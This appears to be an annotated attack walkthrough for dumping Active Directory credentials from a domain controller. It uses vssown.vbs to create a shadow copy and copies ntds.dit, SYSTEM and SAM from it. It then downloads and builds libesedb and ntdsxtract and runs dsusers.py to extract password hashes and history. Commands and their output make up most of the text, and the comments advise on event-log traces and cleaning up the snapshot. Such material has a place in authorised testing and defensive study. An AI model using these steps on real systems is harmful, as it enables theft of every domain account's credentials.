# Start the Volume Shadow Copy service (vssown.vbs drives VSS through WMI; this and every step below need local Administrator rights on the target, here a domain controller)
C:\bak>cscript vssown.vbs /start | |
Microsoft (R) Windows Script Host Version 5.8 | |
Copyright (C) Microsoft Corporation. All rights reserved. | |
[*] Signal sent to start the VSS service. | |
# Create a Volume Shadow Copy. "C" is the drive where the files reside; on many DCs ntds.dit lives on a different volume, so check before choosing the drive letter
C:\bak>cscript vssown.vbs /create C | |
Microsoft (R) Windows Script Host Version 5.8 | |
Copyright (C) Microsoft Corporation. All rights reserved. | |
[*] Attempting to create a shadow copy. | |
# List the shadow copies and note the "Device object" path of the one just created; it is the root for the copy commands below
C:\bak>cscript vssown.vbs /list | |
Microsoft (R) Windows Script Host Version 5.8 | |
Copyright (C) Microsoft Corporation. All rights reserved. | |
SHADOW COPIES | |
============= | |
[*] ID: {XXX} | |
[*] Client accessible: True | |
[*] Count: 1 | |
[*] Device object: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4 | |
[*] Differential: True | |
[*] Exposed locally: False | |
[*] Exposed name: | |
[*] Exposed remotely: False | |
[*] Hardware assisted: False | |
[*] Imported: False | |
[*] No auto release: True | |
[*] Not surfaced: False | |
[*] No writers: True | |
[*] Originating machine: DS-DC03.ds.xxx.yyy | |
[*] Persistent: True | |
[*] Plex: False | |
[*] Provider ID: {XXX} | |
[*] Service machine: DS-DC03.ds.xxx.yyy | |
[*] Set ID: {XXX} | |
[*] State: 12 | |
[*] Transportable: False | |
[*] Volume name: \\?\Volume{XXX}\ | |
# Copy ntds.dit (the AD database), SYSTEM (the registry hive holding the boot key needed to decrypt it) and SAM (only needed for the DC's local accounts) into the working directory from the shadow copy device object listed above (\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4). The copies are read from the snapshot, so the live, locked ntds.dit is never touched
C:\bak>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\windows\system32\config\SYSTEM . | |
1 file(s) copied. | |
C:\bak>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\windows\system32\config\SAM . | |
1 file(s) copied. | |
C:\bak>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\ntds\ntds.dit . | |
1 file(s) copied. | |
# The database may also be at \windows\ntds\ntds.dit: C:\bak>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\windows\ntds\ntds.dit .
# It can also sit on another drive such as E:\, so check the DSA Database file path first; if so, make a shadow copy of that drive the same way as C above
# At this point copy ntds.dit, SYSTEM and SAM to your box by whatever means you prefer. Clean up afterwards: the shadow copy is persistent ("No auto release: True") and remains on the DC until removed (vssown.vbs has a /delete option for this), and both the VSS start and the snapshot creation leave event log entries
# You will need the following tools to extract the data from the copied files. Note that both are fetched from unauthenticated or third-party locations (plain HTTP and a Google Drive mirror): verify the archives against a known-good checksum or the upstream project before building and running them against domain credential material
wget http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
wget https://googledrive.com/host/0B3fBvzttpiiSN082cmxsbHB0anc/libesedb-alpha-20120102.tar.gz # thanks to mubix for this link
tar zxvf libesedb-alpha-20120102.tar.gz | |
unzip ntdsxtract_v1_0.zip | |
root@host:~/# cd libesedb-20120102 | |
root@host:~/libesedb-20120102# ./configure | |
root@host:~/libesedb-20120102# make | |
root@host:~/libesedb-20120102# cd esedbtools/ | |
root@host:~/libesedb-20120102/esedbtools# ./esedbexport ntds.dit   # point this at the copied ntds.dit; the exported tables land in a directory next to it (ntds.dit.export/ by default)
cd "NTDSXtract 1.0/"   # the directory name contains a space, so it must be quoted
# <datatable> and <link table> are the exported datatable.N and link_table.N files from the esedbexport output directory. The hive argument must be the SYSTEM file copied from the shadow copy above (it was copied as "SYSTEM", not "SYSTEM.hive", so adjust the path to match where you placed it)
python dsusers.py <datatable> <link table> --passwordhashes ../SYSTEM --passwordhistory ../SYSTEM